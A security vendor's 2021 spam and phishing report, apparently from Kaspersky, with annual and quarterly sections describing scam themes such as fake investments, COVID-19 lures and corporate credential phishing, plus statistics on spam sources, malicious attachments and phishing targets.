Figures of the year

In 2021:

• 45.56% of e-mails were spam
• 24.77% of spam was sent from Russia with another 14.12% from Germany
• Our Mail Anti-Virus blocked 148 173 261 malicious attachments sent in e-mails
• The most common malware family found in attachments were Agensla Trojans
• Our Anti-Phishing system blocked 253 365 212 phishing links
• Safe Messaging blocked 341 954 attempts to follow phishing links in messengers

Trends of the year

How to make an unprofitable investment with no return

The subject of investments gained significant relevance in 2021, with banks and other organizations actively promoting investment and brokerage accounts. Cybercriminals wanted in on this trend and tried to make their “investment projects” look as alluring as possible. Scammers used the names of successful individuals and well-known companies to attract attention and gain the trust of investors. That’s how cybercriminals posing as Elon Musk or the Russian oil and gas company Gazprom Neft tricked Russian-speaking victims into parting with small sums of money in the hope of landing a pot of gold later. In some cases, they’d invite the “customer” to have a consultation with a specialist in order to come across as legit. The outcome would still be the same: the investor would receive nothing in return for giving their money to the scammers.

Similar schemes targeting English speakers were also intensively deployed online. Scammers encouraged investment in both abstract securities and more clearly outlined projects, such as oil production. In both cases, victims received nothing in return for their money.

Another trick was to pose as a major bank and invite victims to participate in investment projects. In some instances, scammers emphasized stability and the lack of risk involved for the investor, as well as the status of the company they were posing as. In order to make sure the investors didn’t think the process sounded too good to be true, victims were invited to take an online test or fill out an application form which would ostensibly take some time to be “processed”.

Films and events “streamed” on fake sites: not seeing is believing!

Online streaming of hyped film premieres and highly anticipated sports events was repeatedly used to lure users in 2021. Websites offering free streaming of the new Bond movie or the latest Spider-Man film appeared online shortly ahead of the actual release date, continuing to pop up until the eve of the official premiere. Scammers used various ploys to try and win the victim’s trust. They used official advertisements and provided a synopsis of the film on the website.

However, the promised free stream would be interrupted before the film even got going. Visitors to the site would be shown a snippet of a trailer or a title sequence from one of the major film studios, which could have absolutely nothing to do with the film being used as bait. Visitors would then be asked to register on the website in order to continue watching. The same outcome was observed when users tried to download or stream sports events or other content, the only difference was visitors might not be able to watch anything without registering. Either way the registration was no longer free. The registration fee would only be a symbolic figure according to the information provided on the website, but any amount of money could be debited once the user had entered their bank card details, which would immediately fall into the hands of attackers.

A special offer from cybercriminals: try hand at spamming

More and more often, scam websites posing as large companies that promise huge cash prizes in return for completing a survey have begun setting out stricter criteria for those who want a chance to win. After answering a few basic questions, “prize winners” are required to share information about the prize draw with a set number of their contacts via a messaging app. Only then is the victim invited to pay a small “commission fee” to receive their prize. This means the person who completes the full task not only gives the scammers money, but also recommends the scam to people in their list of contacts. Meanwhile, friends see the ad is from someone they know rather than some unknown number, which could give them a false sense of security, encouraging them to follow the link and part with their money in turn.

Hurry up and lose your account: phishing in the corporate sector

The main objective for scammers in an attack on an organization remained getting hold of corporate account credentials. The messages that cybercriminals sent to corporate e-mail addresses were increasingly disguised as business correspondence or notifications about work documents that required the recipient’s attention. The attackers’ main objective was to trick the victim into following the link to a phishing page for entering login details. That’s why these e-mails would contain a link to a document, file, payment request, etc., where some sort of urgent action supposedly needed to be taken.

The fake notification would often concern some undelivered messages. They needed to be accessed via some sort of “email Portal” or another similar resource.

Another noticeable phishing trend targeting the corporate sector was to exploit popular cloud services as bait. Fake notifications about meetings in Microsoft Teams or a message about important documents sent via SharePoint for salary payment approval aimed to lower the recipient’s guard and prompt them to enter the username and password for their corporate account.

COVID-19

Scams

The subject of COVID-19 which dominated newsfeeds throughout the entire year was exploited by scammers in various schemes. In particular, attackers continued sending out messages about compensation and subsidies related to restrictions imposed to combat the pandemic, as this issue remained top of the agenda. The e-mails contained references to laws, specific measures imposed and the names of governmental organizations to make them sound more convincing. To receive the money, the recipient supposedly just needed to pay a small commission fee to cover the cost of the transfer. In reality, the scammers disappeared after receiving their requested commission along with the victim’s bank card details.

The sale of fake COVID vaccination passes and QR codes became another source of income for cybercriminals. The fraudsters emphasized how quickly they could produce forged documents and personalized QR codes. These transactions are dangerous in that, on the one hand, the consequences can be criminal charges in some countries, and on the other hand, scammers can easily trick the customer. There’s no guarantee that the code they’re selling will work. Another risk is that the buyer needs to reveal sensitive personal information to the dealer peddling the certs in order to make the transaction.

The corporate sector

COVID-19 remained a relevant topic in phishing e-mails targeting the business sector. One of the main objectives in these mailing operations was to convince recipients to click a link leading to a fake login page and enter the username and password for their corporate account. Phishers used various ploys related to COVID-19. In particular, we detected notifications about compensation allocated by the government to employees of certain companies. All they needed to do in order to avail of this promised support was to “confirm” their e-mail address by logging in to their account on the scam website.

Another malicious mailshot utilized e-mails with an attached HTML file called “Covid Test Result”. Recipients who tried to open the file were taken to a scam website where they were prompted to enter the username and password for their Microsoft account.

The “important message about vaccination” which supposedly lay unread in a recipient’s inbox also contained a link to a page belonging to attackers requesting corporate account details.

Another type of attack deployed e-mails with malicious attachments. Shocking news, such as immediate dismissal from work accompanied by the need to take urgent action and read a “2 months salary receipt” were intended to make the recipient open the attachment with the malicious object as quickly as possible.

COVID-19 vaccination

While authorities in various countries gradually rolled out vaccination programs for their citizens, cybercriminals exploited people’s desire to protect themselves from the virus by getting vaccinated as soon as possible. For instance, some UK residents received an e-mail claiming to be from the country’s National Health Service. In it, the recipient was invited to be vaccinated, having first confirmed their participation in the program by clicking on the link. In another mailing, scammers emphasized that only people over the age of 65 had the opportunity to get vaccinated.

In both cases, a form had to be filled out with personal data to make a vaccination appointment; and in the former case, the phishers also asked for bank card details. If the victim followed all the instructions on the fake website, they handed their account and personal data over to the attackers.

Another way to gain access to users’ personal data and purse strings was through fake vaccination surveys. Scammers sent out e-mails in the name of large pharmaceutical companies producing COVID-19 vaccines, or posing as certain individuals. The e-mail invited recipients to take part in a small study.

The scammers promised gifts or even monetary rewards to those who filled out the survey. After answering the questions, the victim would be taken to a “prize” page but told to pay a small necessary “commission fee” in order to receive it. The scammers received the money, but the victim got nothing as a result.

We also observed a mailing last year which exploited the subject of vaccination to spread malware. The subject lines of these e-mails were randomly selected from various sources. The attached document contained a macro for running a PowerShell script detected as Trojan.MSOffice.SAgent.gen. SAgent malware is used at the initial stage of an attack to deliver other malware to the victim’s system.

Statistics: spam

Share of spam in mail traffic

On average, 45.56% of global mail traffic was spam in 2021. The figure fluctuated over the course of the year.

Share of spam in global e-mail traffic, 2021 (download)

We observed the largest percentage of spam in the second quarter (46.56%), which peaked in June (48.03%). The fourth quarter was the quietest period (44.54%), with only 43.70% of e-mails detected as spam in November.

Source of spam by country or region

Like in 2020, the most spam in 2021 came from Russia (24.77%), whose share rose by 3.5 p.p. Germany, whose share rose 3.15 p.p. to 14.12%, remained in second place. They were followed by the United States (10.46%) and China (8.73%), who’ve also stayed put in third and fourth place. The share of spam sent from the United States barely moved, while China’s rose 2.52 p.p. compared to 2020.

Sources of spam by country or region in 2021 (download)

The Netherlands (4.75%) moved up to fifth place, with its share rising by just 0.75 p.p. to overtake France (3.57%), whose share went in the opposite direction. Spain (3.00%) and Brazil (2.41%) also swapped places, and the top ten was rounded out by the same two countries as 2020, Japan (2,36%) and Poland (1.66%). In total, over three quarters of the world’s spam was sent from these ten countries.

Malicious mail attachments

Dynamics of Mail Anti-Virus triggerings in 2021 (download)

In 2021, the Kaspersky Mail Anti-Virus blocked 148 173 261 malicious e-mail attachments. May was the quietest month, when just over 10 million attachments were detected, i.e., 7.02% of the annual total. In contrast, October turned out to be the busiest month, when we recorded over 15 million attacks blocked by the Mail Anti-Virus, i.e., 10.24% of the annual total.

Malware families

The attachments most frequently encountered and blocked by the antivirus in 2021 were Trojans from the Agensla family, which steal login credentials stored in browsers as well as credentials from e-mail and FTP clients. Members of this family were found in 8.67% of the malicious files detected, which is 0.97 p.p. up on 2020. Second place was taken by Badun Trojans (6.31%), distributed in archives and disguised as electronic documents. In another 3.95% of cases, our products blocked attacks exploiting the CVE-2017-11882 vulnerability in Microsoft Equation Editor, which remains significant for the fourth year in a row. Almost the same amount of attachments belonged to the Taskun (3.93%) family, which create malicious tasks in Windows Task Scheduler.

TOP 10 malware families spread by e-mail attachments in 2021 (download)

The fifth and tenth most popular forms of malware sent in attachments were Noon spyware Trojans for any version of Windows OS (3.63%) and 32-bit versions (1.90%), respectively. Malicious ISO disk images accounted for 3.21% of all attachments blocked, while SAgent Trojans contributed 2.53%. Eighth place was taken by another exploited vulnerability in Equation Editor called CVE-2018-0802 (2.38%), while in the ninth place were Androm backdoors (1.95%), which are mainly used to deliver different types of malware to an infected system.

TOP 10 types of malware spread by e-mail attachments in 2021 (download)

The ten most common verdicts in 2021 coincided with the TOP 10 families. This means attackers mainly spread one member of each family.

Countries and regions targeted by malicious mailings

In 2021, the Mail Anti-Virus most frequently blocked attacks on devices used in Spain (9.32%), whose share has risen for the second year in a row. Russia rose to second place (6.33%). The third largest number of malicious files were blocked in Italy (5.78%).

Countries and regions targeted by malicious mailshots in 2021 (download)

Germany (4.83%) had been the most popular target in phishing attacks for several years until 2020. It dropped to fifth place in 2021, giving way to Brazil (4.84%) whose share was just 0.01 p.p higher than Germany’s. They’re followed in close succession by Mexico (4.53%), Vietnam (4.50%) and the United Arab Emirates (4.30%), with the same countries recorded in 2020 rounding out the TOP 10 targets: Turkey (3.37%) and Malaysia (2.62%).

Statistics: phishing

In 2021, our Anti-Phishing system blocked 253 365 212 phishing links. In total, 8.20% of Kaspersky users in different countries and regions around the world have faced at least one phishing attack.

Map of phishing attacks

Geography of phishing attacks in 2021 (download)

Users living in Brazil made the most attempts to follow phishing links, with the Anti-Phishing protection triggered on devices belonging to 12.39% of users in this country. Brazil was also the top phishing target in 2020. France rose to second place (12.21%), while Portugal (11.40%) remained third. It’s worth noting that phishing activity was so rampant in France last year that the country topped the leaderboard of targeted users in the first quarter.

Mongolia (10.98%) found itself in forth place for the number of users attacked in 2021, making it onto this list for the first time. The countries which followed in close succession were Réunion (10.97%), Brunei (10.89%), Madagascar (10.87%), Andorra (10.79%), Australia (10.74%), and Ecuador (10.73%).

TOP 10 countries by share of users targeted in phishing attacks:

* Share of users on whose devices Anti-Phishing was triggered out of all Kaspersky users in the country in 2021

Top-level domains

Most of the phishing websites blocked in 2021 used a .com domain name like in 2020, whose share rose 7.19 p.p., reaching 31.55%. The second most popular domain name used by attackers was .xyz (13.71%), as those domains are cheap or even free to register. The third row on the list was occupied by the Chinese country-code domain .cn (7.14%). The Russian domain .ru (2.99%) fell to sixth place, although its share has grown since 2020. It now trails behind the domains .org (3.13%) and .top (3.08%), and is followed by the domain names .net (2.20%), .site (1.82%), and .online (1.56%). The list is rounded out by the low-cost .tk domain (1.17%) belonging to the island nation of Tokelau, which attackers are attracted to for the same reason they’re attracted to .xyz.

Most frequent top-level domains for phishing pages in 2021 (download)

Organizations mimicked in phishing attacks

The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an e-mail message or on the web, as long as links to these pages are present in the Kaspersky database.

The demand for online shopping remained high in 2021, which is reflected in phishing trends: phishing pages were most frequently designed to mimic online stores (17.61%). These were closely followed by global Internet portals (17.27%) in second place. Payment systems (13.11%) climbed to third place, rising 4.7 p.p. to overtake banks (11.11%) and social networks (6.34%). Instant messengers (4.36%) and telecom companies (2.09%) stayed in sixth and seventh place, respectively, although their shares both fell. IT companies (2.00%) and financial services (1.90%) also held onto their places in the rating. The TOP 10 was rounded out by online games (1.51%), as attackers went after gamers more frequently than after users of delivery services in 2021.

Distribution of organizations most often mimicked by phishers, by category, 2021 (download)

Phishing in messengers

Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them.

In 2021, Safe Messaging blocked 341 954 attempts to follow phishing links in various messengers. Most of these were links that users tried to follow from WhatsApp (90.00%). Second place was occupied by Telegram (5.04%), with Viber (4.94%) not far behind.

Distribution of links blocked by the Safe Messaging component, by messenger, 2021 (download)

On average, WhatsApp users attempted to follow phishing links 850 times a day. We observed the least phishing activity at the beginning of the year, while in December the weekly number of blocked links exceeded the 10 000 mark. We have observed a spike in phishing activity on WhatsApp in July, when the Trojan.AndroidOS.Whatreg.b, which is mainly used to register new WhatsApp accounts, also became more active. We can’t say for sure that there’s a connection between Whatreg activity and phishing in this messaging app, but it’s a possibility. We also observed another brief surge in phishing activity on the week from October 31 through to November 6, 2021.

Dynamics of phishing activity on WhatsApp in 2021 (weekly number of detected links shown)

On average, the Safe Messaging component detected 45 daily attempts to follow phishing links sent via Telegram. Similar to WhatsApp, phishing activity increased towards the end of the year.

Dynamics of phishing activity on Telegram in 2021 (weekly number of detected links shown)

A daily average of 45 links were also detected on Viber, although phishing activity on this messenger dropped off towards the end of the year. However, we observed a peak in August 2021.

Dynamics of phishing activity on Viber in 2021 (weekly number of detected links shown)

Conclusion

As we had expected, the key trends from 2020 continued into 2021. Attackers actively exploited the subject of COVID-19 in spam e-mails, which remained just as relevant as it was a year earlier. Moreover, baits related to vaccines and QR codes — remaining two of the year’s main themes — were added to the bag of pandemic-related tricks. As expected, we continued to observe a variety of schemes devised to hack corporate accounts. In order to achieve their aims, attackers forged e-mails mimicking notifications from various online collaboration tools, sent out notifications about non-existent documents and similar business-related baits. There were also some new trends, such as the investment scam which is gaining momentum.

The key trends in phishing attacks and scams are likely to continue into the coming year. Fresh “investment projects” will replace their forerunners. “Prize draws” will alternate with holiday giveaways when there’s a special occasion to celebrate. Attacks on the corporate sector aren’t going anywhere either. Given remote and hybrid working arrangements are here to stay, the demand for corporate accounts on various platforms is unlikely to wane. The topic of COVID-19 vaccination status will also remain relevant. Due to the intensity of the measures being imposed in different countries to stop the spread of the virus, we’ll more than likely see a surge in the number of forged documents up for sale on the dark web, offering unrestricted access to public places and allowing holders to enjoy all the freedoms of civilization.

Quarterly highlights

Scamming championship: sports-related fraud

This summer and early fall saw some major international sporting events. The delayed Euro 2020 soccer tournament was held in June and July, followed by the equally delayed Tokyo Olympics in August. Q3 2021 also featured several F1 Grand Prix races. There was no way that cybercriminals and profiteers could pass up such a golden opportunity. Fans wanting to attend events live encountered fake ticket-selling websites. Some sites made a point of stressing the tickets were “official”, despite charging potential victims several times the real price of a ticket, and some just took the money and disappeared.

Scammers also laid traps for those preferring to watch the action online from the comfort of home. Fraudulent websites popped up offering free live broadcasts. On clicking the link, however, the user was asked to pay for a subscription. If that did not deter them, their money and bank card details went straight to the scammers, with no live or any other kind of broadcast in return. This scheme has been used many times before, only instead of sporting events, victims were offered the hottest movie and TV releases.

Soccer video games always attract a large following. This success has a downside: gaming platforms get attacked by hackers, especially during major soccer events. Accordingly, the Euro 2020 championship was used by scammers as bait to hijack accounts on the major gaming portal belonging to Japanese gaming giant Konami. The cybercriminals offered users big bonuses in connection with the tournament. However, when attempting to claim the bonus, the victim would land on a fake Konami login page. If they entered their credentials, the attackers took over their account and the “bonus” evaporated into thin air.

“Nigerian prince” scammers also had a close eye on Q3’s sporting fixture. The e-mails that came to our attention talked about multi-million-dollar winnings in Olympics-related giveaways. To receive the prize, victims were asked to fill out a form and e-mail it to the cybercriminals.

Some messages anticipated upcoming events in the world of sport. The FIFA World Cup is slated for far-off November — December 2022, yet scammers are already inventing giveaways related to it.

Among other things, we found some rather unusual spam e-mails with an invitation to bid for the supply of products to be sold at airports and hotels during the World Cup. Most likely, the recipients would have been asked to pay a small commission to take part in the bidding or giveaway, with no results ever coming forth.

Scam: get it yourself, share with friends

In Q3 2021, our solutions blocked more than 5.6 million redirects to phishing pages. Anniversaries of well-known brands have become a favorite topic for attackers. According to announcements on fake sites, IKEA, Amazon, Tesco and other companies all held prize draws to celebrate a milestone date. Wannabe participants had to perform a few simple actions, such as taking a survey or a spot-the-hidden-prize contest, or messaging their social network contacts about the promotion, and then were asked to provide card details, including the CVV code, to receive the promised payout. That done, the attackers not only got access to the card, but also requested payment of a small commission to transfer the (non-existent) winnings. Curiously, the scammers came up with fake round dates, for example, the 80th anniversary of IKEA, which in reality will come two years later. It is always advisable to check promotions on official websites, rather than trusting e-mails, which are easy to spoof.

There were also plenty of “holiday deals” supposedly from major Russian brands, with some, it seemed, showing particular generosity in honor of September 1, or Knowledge Day, when all Russian schools and universities go back after the summer break. Those companies allegedly giving away large sums were all related to education in one way or another. At the same time, the fraudulent scheme remained largely the same, with just some minor tinkering round the edges. For example, fake Detsky Mir (Children’s World, a major chain of kids’ stores) websites promised a fairly large sum of money, but on condition that the applicant sends a message about the “promotion” to 20 contacts or 5 groups. And the payment was then delayed, allegedly due to the need to convert dollars into rubles: for this operation, the “lucky ones” had to pay a small fee.

On a fake website holding a giveaway under the Perekrestok brand, after completing the tasks the “winner” was promised as a prize a QR code that could supposedly be used to make purchases in the company’s stores. Note that Perekrestok does indeed issue coupons with QR codes to customers; that is, the cybercriminals tried to make the e-mail look plausible. When trying to retrieve this code, the potential victim would most likely be asked to pay a “commission” before being able to spend the prize money. Note too that QR codes from questionable sources can carry other threats, for example, spreading malware or debiting money in favor of the scammers.

In 2021, there was an increase in the number of fake resources posing as cookie-selling platforms. Users were promised a generous monetary reward (up to $5,000 a day) for selling such data. Those who fell for the tempting offer and followed the link were redirected to a fake page that allegedly “reads cookies from the victim’s device to estimate their market value.” The “valuation” most often landed in the US$700–2,000 range. To receive this money, the user was asked to put the cookies up at a kind of auction, in which different companies were allegedly taking part. The scammers assured that the data would go to the one offering the highest price.

If the victim agreed, they were asked to link their payment details to the account in the system and to top it up by €6, which the scammers promised to return, together with the auction earnings, within a few minutes. To top up the balance, the victim was required to enter their bank card details into an online form. Naturally, they received no payment, and the €6 and payment details remained in the attackers’ possession.

Note that the very idea of selling cookies from your device is risky: these files can store confidential information about your online activity — in particular, login details that let you avoid having to re-enter your credentials on frequently used sites.

Even in official mobile app stores, malware can sometimes sneak in. As such, this quarter saw a new threat in the shape of fraudulent welfare payment apps that could be downloaded on such platform. The blurb described them as software that helps find and process payments from the government that the user is entitled to. Due payments (fake, of course) were indeed found, but to receive the money, the user was requested to “pay for legal services relating to form registration”. The numerous positive reviews under the application form, as well as the design mimicking real government sites, added credibility. We informed the store in question, which they removed the fraudulent apps.

Spam support: call now, regret later

E-mails inviting the recipient to contact support continue to be spam regulars. If previously they were dominated by IT topics (problems with Windows, suspicious activity on the computer, etc.), recently we have seen a rise in the number of e-mails talking about unexpected purchases, bank card transactions or account deactivation requests. Most likely, the change of subject matter is an attempt to reach a wider audience: messages about unintentional spending and the risk of losing an account can frighten users more than abstract technical problems. However, the essence of the scam remained the same: the recipient, puzzled by the e-mail about a purchase or transfer they did not make, tried to call the support service at the number given in the message. To cancel the alleged transaction or purchase, they were asked to give their login credentials for the site from where the e-mail supposedly came. This confidential information fell straight into the hands of the cybercriminals, giving them access to the victim’s account.

COVID-19

New life was injected into the COVID-19 topic this quarter. In connection with mass vaccination programs worldwide, and the introduction of QR codes and certificates as evidence of vaccination or antibodies, fraudsters began “selling” their own. We also encountered rogue sites offering negative PCR test certificates. The “customer” was asked first to provide personal information: passport, phone, medical policy, insurance numbers and date of birth, and then to enter their card details to pay for the purchase. As a result, all this information went straight to the malefactors.

Spam in the name of generous philanthropists and large organizations offering lockdown compensation is already a standard variant of the “Nigerian prince” scam.

However, “Nigerian prince” scams are not all that might await recipients of such messages. For example, the authors of spam exploiting Argentina’s BBVA name had a different objective. Users were invited to apply for government subsidy through this bank. To do so, they had to unpack a RAR archive that allegedly contained a certificate confirming the compensation. In reality, the archive harbored malware detected by our solutions as Trojan.Win32.Mucc.pqp.

Cybercriminals also used other common COVID-19 topics to trick recipients into opening malicious attachments. In particular, we came across messages about the spread of the delta variant and about vaccination. The e-mail headers were picked from various information sources, chosen, most likely, for their intriguing nature. The attached document, detected as Trojan.MSOffice.SAgent.gen, contained a macro for running a PowerShell script. SAgent malware is used at the initial stage of the attack to deliver other malware to the victim’s system.

Corporate privacy

A new trend emerged this quarter in spam e-mails aimed at stealing credentials for corporate accounts, whereby cybercriminals asked recipients to make a payment. But upon going to the website to view the payment request, the potential victims were requested to enter work account login details. If they complied, the attackers got hold of the account.

Statistics: spam

Share of spam in mail traffic

In Q3 2021, the share of spam in global mail traffic fell once again, averaging 45.47% — down 1.09 p.p. against Q2 and 0.2 p.p. against Q1.

Share of spam in global mail traffic, April – September 2021 (download)

In July, this indicator fell to its lowest value since the beginning of 2021 (44.95%) — 0.15 p.p. less than in March, the quietest month of H1. The highest share of spam in Q3 was seen in August (45.84%).

Source of spam by country

The top spam-source country is still Russia (24.90%), despite its share dropping slightly in Q3. Germany (14.19%) remains in second place, while China (10.31%) moved into third this quarter, adding 2.53 p.p. Meanwhile, the US (9.15%) shed 2.09 p.p. and fell to fourth place, while the Netherlands held on to fifth (4.96%).

Source of spam by country, Q3 2021 (download)

On the whole, the TOP 10 countries supplying the bulk of spam e-mails remained virtually unchanged from Q2. Sixth position still belongs to France (3.49%). Brazil (2.76%) added 0.49 p.p., overtaking Spain (2.70%) and Japan (2.24%), but the TOP 10 members remained the same. At the foot of the ranking, as in the previous reporting period, is India (1.83%).

Malicious mail attachments

Mail Anti-Virus this quarter blocked more malicious attachments than in Q2. Our solutions detected 35,958,888 pieces of malware, over 1.7 million more than in the previous reporting period.

Dynamics of Mail Anti-Virus triggerings, April – September 2021 (download)

During the quarter, the number of Mail Anti-Virus triggerings grew: the quietest month was July, when our solutions intercepted just over 11 million attempts to open an infected file, while the busiest was September, with 12,680,778 malicious attachments blocked.

Malware families

In Q3 2021, Trojans from the Agensla family (9.74%) were again the most widespread malware in spam. Their share increased by 3.09 p.p. against the last quarter. These Trojans are designed to steal login credentials from the victim’s device. The share of the Badun family, which consists of various malware disguised as electronic documents, decreased slightly, pushing it into second place. Third place was taken by the Noon spyware (5.19%), whose 32-bit relatives (1.71%) moved down to ninth. Meanwhile, the Taskun family, which creates malicious tasks in Task Scheduler, finished fourth this time around, despite its share rising slightly.

TOP 10 malware families in mail traffic, Q3 2021 (download)

The sixth place in TOP 10 common malware families in spam in Q3 was occupied by exploits for the CVE-2018-0802 vulnerability (3.28%), a new addition to the list. This vulnerability affects the Equation Editor component, just like the older but still popular (among cybercriminals) CVE-2017-11882, exploits for which (3.29%) were the fifth most prevalent in Q3. Seventh position went to malicious ISO disk images (2.97%), and eighth to Androm backdoors (1.95%). Loaders from the Agent family again propped up the ranking (1.69%).

The TOP 10 most widespread e-mail malware in Q3 was similar to the families ranking. The only difference is that ninth place among individual samples is occupied by Trojan-PSW.MSIL.Stealer.gen stealers.

TOP 10 malicious attachments in spam, Q3 2021 (download)

Countries targeted by malicious mailings

In Q3, Mail Anti-Virus was most frequently triggered on the computers of users in Spain. This country’s share again grew slightly relative to the previous reporting period, amounting to 9.55%. Russia climbed to second place, accounting for 6.52% of all mail attachments blocked from July to September. Italy (5.47%) rounds out TOP 3, its share continuing to decline in Q3.

Countries targeted by malicious mailings, Q3 2021 (download)

Brazil (5.37%) gained 2.46 p.p. and moved up to fourth position by number of Mail Anti-Virus triggerings. It is followed by Mexico (4.69%), Vietnam (4.25%) and Germany (3.68%). The UAE (3.65%) drops to eighth place. Also among the TOP 10 targets are Turkey (3.27%) and Malaysia (2.78%).

Statistics: phishing

In Q3, the Anti-Phishing system blocked 46,340,156 attempts to open phishing links. A total of 3.56% of Kaspersky users encountered this threat.

Geography of phishing attacks

Brazil had the largest share of affected users (6.63%). The TOP 3 also included Australia (6.41%) and Bangladesh (5.42%), while Israel (5.33%) dropped from second to fifth, making way for Qatar (5.36%).

Geography of phishing attacks, Q3 2021 (download)

Top-level domains

The top-level domain most commonly used for hosting phishing pages in Q3, as before, was COM (29.17%). Reclaiming second place was XYZ (14.17%), whose share increased by 5.66 p.p. compared to the previous quarter. ORG (3.65%) lost 5.14 p.p. and moved down to fifth place, letting both the Chinese domain CN (9.01%) and TOP (3.93%) overtake it.

Top-level domain zones most commonly used for phishing, Q3 2021 (download)

The Russian domain RU (2.60%) remained the sixth most popular among cybercriminals in Q3, while the last four lines of the TOP 10 are occupied by the international domains NET (2.42%), SITE (1.84%), ONLINE (1.40%) and INFO (1.11%).

Organizations under phishing attack

The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database.

Global internet portals (20.68%) lead the list of organizations whose brands were most often used by cybercriminals as bait. Online stores (20.63%) are in second place by a whisker. Third place, as in the last quarter, is taken by banks (11.94%), and fourth by payment systems (7.78%). Fifth and sixth positions go to the categories “Social networks and blogs” (6.24%) and “IMs” (5.06%), respectively.

Distribution of organizations whose users were targeted by phishers, by category, Q3 2021 (download)

The seventh line is occupied by online games (2.42%). Note that for the past two years websites in this category have featured in the TOP 10 baits specifically in the third quarter. Financial services (1.81%), IT companies (1.72%) and telecommunication companies (1.45%) round out the ranking.

Phishing in messengers

Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them.

In Q3 2021, Safe Messaging blocked 117,854 attempted redirects via phishing links in various messengers. Of these, 106,359 links (90.25%) were detected and blocked in WhatsApp messages. Viber accounted for 5.68%, Telegram for 3.74% and Google Hangouts for 0.02% of all detected links.

Distribution of links blocked by the Safe Messaging component, by messenger, Q3 2021 (download)

On WhatsApp, Safe Messaging detected an average of 900 phishing links per day during the quarter. There was a surge in scamming activity in this period, though — on July 12–16 the system blocked more than 4,000 links a day. This spike coincided with an increase in detections of the Trojan.AndroidOS.Whatreg.b Trojan, which registers new WhatsApp accounts from infected devices. We cannot say for sure what exactly these accounts get up to and whether they have anything to do with the rise in phishing on WhatsApp, but it is possible that cybercriminals use them for spamming.

Dynamics of phishing activity on WhatsApp, Q3 2021

As for Telegram, phishing activity there increased slightly towards the end of the quarter.

Dynamics of phishing activity on Telegram, Q3 2021

Takeaways

Next quarter, we can expect Christmas- and New Year-themed mailings. Ahead of the festive season, many people make purchases from online stores, a fact exploited by cybercriminals. Anonymous fake stores taking money for non-existent or substandard goods are likely to be a popular scamming method during this period. Also beware of fraudulent copies of big-name trading platforms — such sites traditionally mushroom ahead of the festive frenzy. Corporate users too should remain sharp-eyed — even a congratulatory e-mail seemingly from a partner may be phishing for confidential information.

The COVID-19 topic will still be hot in the next quarter. The fourth wave of the pandemic, vaccinations and the introduction of COVID passports in many countries will surely give rise to new malicious mailings. Also be on the lookout for websites offering compensation payments: if previous quarters are anything to go by, cybercriminals will continue to find new and enticing ways to lure their victims.

Quarterly highlights

The corporate sector

In Q2 2021, corporate accounts continued to be one of the most tempting targets for cybercriminals. To add to the credibility of links in emails, scammers imitated mailings from popular cloud services. This technique has been used many times before. A fake notification about a Microsoft Teams meeting or a request to view an important document traditionally takes the victim to a phishing login page asking for corporate account credentials.

Cybercriminals also faked emails from cloud services in schemes aimed at stealing not accounts but money. We saw, for example, spoofed messages about a comment added to a document stored in the cloud. The document itself most likely did not exist: at the other end of the link was the usual recipe for making a fast buck online by investing in Bitcoin or a similarly tempting offer. Such “offers” usually require the victim to pay a small amount upfront to claim their non-existent reward.

In addition to various cloud-related emails, we blocked messages disguised as business correspondence and containing links to malware. In particular, an email threatening legal action claimed that the victim had not paid for a completed order. To resolve the issue amicably, the recipient was asked to review the documents confirming the order completion and to settle the bill by a certain date. The documents were supposedly available via the link provided and protected by a special code. In fact, the file named “Договор №8883987726 от 10.10.2021.pdf.exe” (Agreement #8883987726 of 10.10.2021.pdf.exe) that the victim was asked to download was a malicious program known as Backdoor.Win32.RWS.a.

COVID-19 compensation fraud

In Q2 2021, scammers continued to exploit the theme of pandemic-related compensation. This time, offers of financial assistance were mostly sent in the name of government agencies. “The UK Government” and “the US Department of the Treasury” were ready to pay out special grants to all-comers. However, attempts to claim the promised handout only led to monetary loss or compromised bank card details. It goes without saying that the grants did not materialize.

It was bank card details, including CVV codes, that were the target of a gang of cybercriminals who created a fake informational website about social assistance for citizens of Belarus. To make the pages look official, the scammers described in detail the system of payouts depending on the applicant’s line of work and other conditions. The information bulletin issued in the name of the Belarus Ministry of Health clearly spelled out the payment amounts for medical staff. Workers in other fields were invited to calculate their entitled payout by clicking the Get Social Assistance button. This redirected the visitor to a page with a form for entering bank card details.

Parcel scam: buy one, get none

Unexpected parcels requiring payment by the recipient remained one of the most common tricks this past quarter. Moreover, cybercriminals became more adept at localizing their notifications: Q2 saw a surge in mass mailings in a range of languages. The reason for the invoice from the “mail company” could be anything from customs duties to shipment costs. When trying to pay for the service, as with compensation fraud, victims were taken to a fake website, where they risked not only losing the amount itself (which could be far higher than specified in the email), but also spilling their bank card details.

Mailed items were the focus of one other fraudulent scheme. Websites appeared offering people the chance to buy out others’ parcels that for some reason could not reach the intended recipients. The “service” was positioned as a lottery — the buyer paid only for the weight of the parcel (the bigger it was, the higher the price), and its contents were not disclosed. To find out what was inside, the lucky owner of the abandoned parcel had to wait for it to arrive at the specified address. Which it didn’t. According to the mail company Russian Post, when the storage period expires, registered items (parcels, letters, postcards, EMS items) are sent to the return address at the sender’s expense. If the sender does not collect the returned item within the storage period, it is considered “unclaimed” and stored for a further six months, after which it is destroyed. In other words, ownerless parcels are not sold. Therefore, any offer to buy them is evidently a scam.

New movies: pay for the pleasure of not watching

Late April saw the annual Oscars ceremony in Hollywood. Movies nominated for an Academy award naturally attract public as well as cybercriminal attention. As a consequence, fake websites popped up offering free viewings and even downloads of Oscar contenders. After launching a video, the visitor of the illegal movie theater was shown several clips of the film (usually taken from the official trailer), before being asked to pay a small subscription fee to continue watching. However, after payment of the “subscription” the movie screening did not resume; instead the attackers had a new bank account to play with.

